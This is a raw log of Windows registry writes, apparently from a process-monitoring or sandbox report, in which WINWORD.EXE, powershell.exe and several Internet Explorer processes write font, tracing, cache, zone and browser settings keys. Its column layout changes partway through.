HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Meiryo UI | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Microsoft Himalaya | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Microsoft JhengHei | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Microsoft New Tai Lue | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Microsoft PhagsPa | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Microsoft Sans Serif | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Microsoft Tai Le | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Microsoft Uighur | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Microsoft YaHei | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Microsoft Yi Baiti | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MingLiU | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MingLiU_HKSCS | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MingLiU_HKSCS-ExtB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MingLiU-ExtB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Miriam | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Miriam Fixed | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Mistral | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Modern No. 20 | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Mongolian Baiti | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Monotype Corsiva | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MoolBoran | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS Gothic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS Mincho | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS Outlook | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS PGothic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS PMincho | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS Reference Sans Serif | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS Reference Specialty | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS Sans Serif | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS Serif | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MS UI Gothic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MT Extra | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | MV Boli | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Narkisim | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Niagara Engraved | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Niagara Solid | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | NSimSun | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Nyala | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | OCR A Extended | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Old English Text MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Onyx | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Palace Script MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Palatino Linotype | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Papyrus | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Parchment | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Perpetua | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Perpetua Titling MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Plantagenet Cherokee | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Playbill | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | PMingLiU | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | PMingLiU-ExtB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Poor Richard | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Pristina | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Raavi | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Rage Italic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Ravie | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Rockwell | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Rockwell Condensed | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Rockwell Extra Bold | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Rod | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Sakkal Majalla | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
26057691
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common
QMSessionCount
3
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\General
LastAutoSavePurgeTime
26057694
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482688
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482689
2080 | powershell.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E | LanguageList | en-US
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | 0
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | 0
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | 4294901760
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | 4294901760
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | 1048576
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | %windir%\tracing
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | 0
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | 0
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | 4294901760
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | 4294901760
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | 1048576
2080 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | %windir%\tracing
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing | NTPDaysSinceLastAutoMigration | 2
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing | NTPLastLaunchLowDateTime | 574382480
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing | NTPLastLaunchHighDateTime | 30752120
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager | NextCheckForUpdateLowDateTime | 874544980
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager | NextCheckForUpdateHighDateTime | 30752120
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix |
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix | Cookie:
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix | Visited:
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | CompatibilityFlags | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | 4600000079000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | 1
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | 1
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 1
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | SecuritySafe | 1
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active | {5FD5F305-A96B-11E9-9FBD-5254004AAD21} | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | FullScreen | no
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | Active | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Type | 3
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Count | 3
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Time | E3070700040012000E0032001A002F03
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Blocked | 3
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP | BackupDefaultSearchScope | ––
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences | 88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977 | 01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF8000000000200000000001066000000010000200000006C70C245CA6F3F435AF6E076943EB33D684FF998B7A6B7B6FDA07F5744A7E1BD000000000E8000000002000020000000E7E1BDD2F9BFC060E044AEAA3CEE4C74D8184C7C3F41F0355974710264813AE3500000007A6E89B6B86E566E042E5B90E6DDE88654BBBC7504B1EAE6EC96F7C95B58F73DA4CA5383BDB75462E1ED6EBAE7BB8596C4830FFDDA864BF288A625C9CED8B052DF8DC15A8A09F16E2C5329BCA543229840000000B1DB1A204D47228F6B7DA06D729F1C67D78E816189D9DB3B25BA16539EF926EE62AF9F45EBC19291876D4C31B271A97E07AC68C65ED6DC028161FC68A72FA010
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP | ChangeNotice | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences | 2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81 | 01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF80000000002000000000010660000000100002000000087AB01A9640678B40B89C1D5717AC17D70A7BEB7AC1CA3B4F87E7DC32278A859000000000E8000000002000020000000CA98E9BF25EAE14B91744EDFB4A5B08FB71353784158B571E4AA2D957EDD5E2210000000FA3E6F660CE3C9F392C037A59317EA5E40000000A67E065EBA3DC78656A9B66BFCEF5FD39832C38FCEB7EA7AD3DE0EFA0E10C60A39E14BB83FC04D207A8A7D1C8A4F18A46194089FEB648885DD194E5BC4F6EC81
2448 | iexplore.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E | LanguageList | en-US
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE | TabBandWidth | 500
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation | CVListXMLVersionLow | 395188358
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation | CVListXMLVersionHigh | 268435456
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation | CVListLastUpdateTime | 3668870
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | VendorId | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | DeviceId | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | SubSysId | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | Revision | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | VersionHigh | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | VersionLow | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | DXFeatureLevel | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | Wow64-VendorId | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | Wow64-DeviceId | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | Wow64-SubSysId | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | Wow64-Revision | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | Wow64-VersionHigh | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | Wow64-VersionLow | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU | Wow64-DXFeatureLevel | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager | HashFileVersionLowPart | 2
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager | HashFileVersionHighPart | 0
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager | NextCheckForUpdateLowDateTime | 2137742680
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager | NextCheckForUpdateHighDateTime | 30752170
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager | LastCheckForUpdateLowDateTime | 895326230
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager | LastCheckForUpdateHighDateTime | 30752120
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation | IECompatVersionHigh | 268435456
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation | IECompatVersionLow | 395188358
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation | StaleCompatCache | 1
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | DecayDateQueue | 01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF800000000020000000000106600000001000020000000F06E4F14DEE839A4BE5371FDFDA996476F883A477FD6B4AEC44133238650D7B0000000000E8000000002000020000000D40745C5C2B16F288E96622BB4C86CAAF831FD4C542D05D6FCFEF50F78BF843E30000000FC27D1B7A959E4C150BED1D931CC30D33F486E9946E7D59EFBF66B288AF2704EA8A67354A6DA7DA1F3485D234C8AC3C1400000003CBCC52364591E3FDA54772F2E09622E10E68919F81A6BA12C79479687B3888DB78E194848972D5B025A3997635C7ABD2FB7E1F73AA05CCF53939002982C96AB
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | LastProcessed | F060F437783DD501
2448 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation | StaleCompatCache | 0
2476 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content | CachePrefix |
2476 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies | CachePrefix | Cookie:
2476 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History | CachePrefix | Visited:
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix |
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix | Cookie:
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix | Visited:
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | CompatibilityFlags | 0
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | 460000007A000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | 1
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | 1
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 1
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 0
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | SecuritySafe | 1
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active | {7C25DFC5-A96B-11E9-9FBD-5254004AAD21} | 0
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | FullScreen | no
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | Active | 0
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Type | 3
